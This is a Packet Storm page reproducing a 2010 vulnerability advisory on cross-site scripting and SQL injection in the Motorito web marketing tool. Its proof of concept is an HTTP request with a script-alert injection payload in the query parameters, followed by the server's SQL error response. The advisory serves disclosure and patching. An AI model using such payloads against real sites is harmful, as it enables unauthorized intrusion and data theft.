exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Motorito Cross Site Scripting / SQL Injection

Motorito Cross Site Scripting / SQL Injection
Posted Sep 24, 2010
Authored by Mario Diaz Caldera

Motorito versions prior to 2.0 Ni 483 suffer from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 537c7a3cd34ef07caade31c0d8c1f782aa119d2bcc9f73934a52ab27c67c0fa1

Motorito Cross Site Scripting / SQL Injection

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2010-005
- Original release date: March 30th, 2010
- Last revised: September 23th, 2010
- Discovered by: Mario Diaz Caldera
- Severity: 5.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
SQL Injection and XSS in Motorito < v2.0 Ni 483

II. BACKGROUND
-------------------------
Motorito is an on-line marketing tool. It is used to manage the
contents of Web Site, create new content, decide which news to put on
the cover, update product catalog, manage the areas of promotion,
manage users, edit the menu items, layout, send e-mails, etc.

III. DESCRIPTION
-------------------------
This bug was found using CENTOS and the last release of Motorito with
Apache 2.2.3 and PHP 5.1.6.

To exploit the vulnerability only is needed use the version 1.0 of the
HTTP protocol to interact with the application, and it is possible to
check that the variables of the module index.php are not properly
filtered.

IV. PROOF OF CONCEPT
-------------------------
GET
/?mmod=>"'><script>alert(4135)</script>&file=>"'><script>alert(4135)</script>
HTTP/1.0
Cookie: PHPSESSID=frdmbbue2fkns0dq33mm1152n3
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: www.testhostwithmotorito.es
Referer: http://www.testhostwithmotorito.es/

HTTP/1.1 200 OK
Content-Length: 361
Date: Fri, 05 Feb 2010 08:53:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: SELECT parentID
FROM sis_menus WHERE module='>"'><script>alert(4135)</script>' <br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right
syntax to use near '><script>alert(4135)</script>'' at line 1)<br>
Session halted.

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also
possible.

VI. SYSTEMS AFFECTED
-------------------------
Motorito < v2.0 Ni 483

VII. SOLUTION
-------------------------
Upgrade to next version of Motorito. It can be obtained from
http://www.motorito.com
Current version (at advisory publication 2.0 - Ni 891).

VIII. REFERENCES
-------------------------
http://www.motorito.com
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered
by Mario Diaz Caldera (mdiaz (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March 30, 2010: Initial release

XI. DISCLOSURE TIMELINE
-------------------------
February 22, 2010: Discovered by Internet Security Auditors.
June 14, 2010: Sent to the vendor.
Response about revision and inclusion in
Project Plan.
September 23, 2010: Request for update. Response about correction.
September 23, 2010: Sent to public lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

XIII. ABOUT
-------------------------
Internet Security Auditors is a Spain based leader in web application
testing, network security, penetration testing, security compliance
implementation and assessing. Our clients include some of the largest
companies in areas such as finance, telecommunications, insurance,
ITC, etc. We are vendor independent provider with a deep expertise
since 2001. Our efforts in R&D include vulnerability research, open
security project collaboration and whitepapers, presentations and
security events participation and promotion. For further information
regarding our security services, contact us.
Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close